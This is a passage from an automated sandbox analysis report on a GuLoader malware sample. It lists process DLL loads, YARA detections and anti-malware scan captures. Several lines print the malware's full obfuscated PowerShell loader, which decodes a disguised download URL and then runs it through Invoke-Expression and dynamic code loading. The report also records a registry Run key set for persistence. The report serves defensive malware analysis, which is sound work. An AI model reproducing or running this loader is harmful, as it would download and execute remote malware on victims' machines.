                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: ystem.Core.pdbz source: powershell.exe, 00000005.00000002.1988660063.000000000769A000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries4", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 00000005.00000002.1994713793.000000000927D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1994393544.00000000089E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1982397865.0000000005F76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($charlady)$gLOBal:tuCKToO = [sYstEm.TexT.EncODiNG]::aSCIi.getStRiNg($jOBBErENS)$GlObal:sEMICOnVENTIOnAlItY=$TucKToo.sUbString($BoRtvend,$blOdBANkeN)<#uddeleren Teioid Andelsbevgelse M
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Revolverbnke $Tankeoverfringens26 $Briskened), (unsanctioning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Phallics = [AppDomain]::CurrentDomain.GetAsse
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tidtagende)), $Kursiver).DefineDynamicModule($Disconformably158, $false).DefineType($Studentereksaminen217, $tremorlessly, [System.Mul
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($charlady)$gLOBal:tuCKToO = [sYstEm.TexT.EncODiNG]::aSCIi.getStRiNg($jOBBErENS)$GlObal:sEMICOnVENTIOnAlItY=$TucKToo.sUbString($BoRtvend,$blOdBANkeN)<#uddeleren Teioid Andelsbevgelse M
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09182B10 push esi; ret 5_2_09182B11
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09183B88 push 087BE6F5h; iretd 5_2_09183B97
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09181A0B push eax; ret 5_2_09181A0C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09181E05 push ss; ret 5_2_09181E0F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0918305A push ds; retf 5_2_0918305B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09182074 push ebx; ret 5_2_0918207F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0918572A push eax; ret 5_2_0918572B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04261E05 push ss; ret 10_2_04261E0F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04261A0B push eax; ret 10_2_04261A0C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04262074 push ebx; ret 10_2_0426207F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0426305A push ds; retf 10_2_0426305B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0426572A push eax; ret 10_2_0426572B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04262B10 push esi; ret 10_2_04262B11
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04263B88 push 087BE6F5h; iretd 10_2_04263B97
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SandsynliggrelsensJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SandsynliggrelsensJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
